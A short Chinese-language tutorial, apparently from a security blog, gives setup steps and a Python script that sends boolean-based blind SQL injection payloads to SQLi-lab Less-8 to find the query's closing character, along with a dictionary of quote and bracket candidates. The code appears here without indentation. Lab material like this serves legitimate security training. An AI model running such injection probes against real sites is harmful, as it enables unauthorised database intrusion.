1、先将字典放入与脚本同一目录下,并且安装好python的环境(建议使用python3)。
2、在目录中新建文件cmd.bat:
3、点击文件cmd.bat打开,输入python 文件(**注意在用之前修改好脚本**)。
4、如下是脚本(本实例基于SQLi-lab):
import requests
import sys
url='http://192.168.243.130:8080/Less-8/?id=3%s'
flag='You are in' #输入标志位
#判别闭合符
def Distinguish(url):
file=open('dictionary.txt','r') #打开字典
content=file.readlines()
for item in content:
pay='%s and 1345=1344 --+'%item.replace("\n","")
payload=url % pay
print(payload)
res=requests.get(payload)
if flag not in res.content.decode("utf-8"):
pay='%s and 1345=1345 --+'%item.replace("\n","")
payload=url % pay
res=requests.get(payload)
if flag in res.content.decode("utf-8"):
print('[-]闭合符为:%s'%item)
break
if __name__ == '__main__':
Distinguish(url)
5、字典如下(字典名:dictionary.txt):
'
"
'"
')
")
]
']
"]